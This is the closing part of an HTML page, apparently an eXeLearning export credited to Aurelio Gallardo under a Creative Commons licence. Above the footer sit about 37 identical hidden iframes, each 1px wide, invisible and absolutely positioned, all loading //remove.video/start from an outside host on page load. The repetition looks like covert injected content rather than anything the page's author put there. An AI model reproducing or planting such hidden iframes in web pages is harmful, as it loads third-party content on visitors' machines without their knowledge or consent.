<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr" width="300" height="150"></iframe></div>
<div><iframe style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/start" id="prefsFr"></iframe></div></div></div></section></div>
</div>
</div>
</div>
</div>
</article>
</section>
<div id="packageLicense" class="cc cc-by-nc-sa">
<p><span>Obra publicada con</span> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/">Licencia Creative Commons Reconocimiento No comercial Compartir igual 4.0</a></p>
</div>
<footer id="siteFooter">Proyecto de recopilación llevado a cabo por Aurelio Gallardo</footer></div>
<p id="made-with-eXe"><a href="https://exelearning.net/" target="_blank" rel="noopener"><span>Creado con eXeLearning<span> (Ventana nueva)</span></span></a></p><script type="text/javascript" src="_adultos_js.js"></script></body></html>